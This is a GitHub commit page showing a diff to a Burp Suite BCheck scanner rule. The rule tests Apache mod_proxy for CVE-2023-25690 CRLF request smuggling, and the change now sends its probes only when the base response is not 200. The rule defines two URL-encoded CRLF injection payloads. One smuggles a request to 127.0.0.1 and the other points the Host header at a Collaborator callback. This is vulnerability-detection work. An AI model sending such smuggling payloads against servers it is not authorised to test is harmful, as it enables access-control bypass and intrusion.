-
Notifications
You must be signed in to change notification settings - Fork 117
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #182 from PortSwigger/issue_181
Only issue payloads if base response status code not 200 (Fixes Issue…
- Loading branch information
Showing
1 changed file
with
28 additions
and
23 deletions.
There are no files selected for viewing
51 changes: 28 additions & 23 deletions
51
vulnerabilities-CVEd/CVE-2023-25690 Apache mod_proxy CRLF Smuggling.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,33 +1,38 @@ | ||
| metadata: | ||
| language: v1-beta | ||
| language: v2-beta | ||
| name: "CVE-2023-25690" | ||
| description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690" | ||
| author: "Peyton Kennedy" | ||
|
|
||
| define: | ||
| injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED` | ||
| injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED` | ||
| injected_payload1 = `%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED` | ||
| injected_payload2 = `%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED` | ||
|
|
||
| given request then | ||
| send request called split: | ||
| method: "GET" | ||
| appending path: {injected_payload1} | ||
| send request called oob: | ||
| method: "GET" | ||
| appending path: {injected_payload2} | ||
| if not({base.response.status_code} is "200") then | ||
| send request called split: | ||
| method: "GET" | ||
| appending path: {injected_payload1} | ||
|
|
||
| if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then | ||
| report issue: | ||
| severity: medium | ||
| confidence: tentative | ||
| detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690" | ||
| remediation: "Upgrade to latest version of Apache mod_proxy" | ||
| end if | ||
| send request called oob: | ||
| method: "GET" | ||
| appending path: {injected_payload2} | ||
|
|
||
| if {split.response.body} matches "\"statusCode\":200" or | ||
| {latest.response.status_code} is "200" then | ||
| report issue and continue: | ||
| severity: medium | ||
| confidence: tentative | ||
| detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690" | ||
| remediation: "Upgrade to latest version of Apache mod_proxy" | ||
| end if | ||
|
|
||
| if http interactions then | ||
| report issue: | ||
| severity: high | ||
| confidence: firm | ||
| detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690" | ||
| remediation: "Upgrade to latest version of Apache mod_proxy" | ||
| end if | ||
| end if | ||
|
|
||
| if http interactions then | ||
| report issue: | ||
| severity: high | ||
| confidence: firm | ||
| detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690" | ||
| remediation: "Upgrade to latest version of Apache mod_proxy" | ||
| end if |